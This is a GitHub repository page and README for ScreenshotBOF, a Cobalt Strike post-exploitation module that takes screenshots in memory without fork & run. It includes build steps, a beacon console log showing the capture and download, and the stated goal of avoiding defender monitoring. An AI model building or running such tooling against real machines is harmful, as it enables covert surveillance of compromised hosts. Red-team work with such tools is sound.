Go to file

CodeXTF2 4f66ef6b8e fixes		2022-10-26 03:11:34 +08:00
ScreenshotBOF	fixes	2022-10-26 03:11:34 +08:00
bin	in memory download	2022-10-26 00:28:47 +08:00
.gitignore	first commit	2022-10-23 16:58:24 +08:00
README.md	readme	2022-10-26 00:35:38 +08:00
ScreenshotBOF.sln	first commit	2022-10-23 16:58:24 +08:00

README.md

ScreenshotBOF

An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory.

Self Compilation

git clone the repo
open the solution in Visual Studio
Build project BOF

Usage

import the screenshotBOF.cna script into Cobalt Strike
use the command screenshot_bof {local filename}

beacon> screenshot_bof sad.bmp
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 4860 bytes
[+] received output:
[*] Tasked beacon to printscreen and save to sad.bmp
[+] received output:
[+] PrintScreen saved to bitmap...
[*] started download of sad.bmp

Notes

no evasion is performed, which should be fine since the WinAPIs used are not malicious

Why did I make this?

Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.

Credits

Made using https://github.com/securifybv/Visual-Studio-BOF-template
Save BMP to file from https://stackoverflow.com/a/60667564
in memory download from https://github.com/anthemtotheego/CredBandit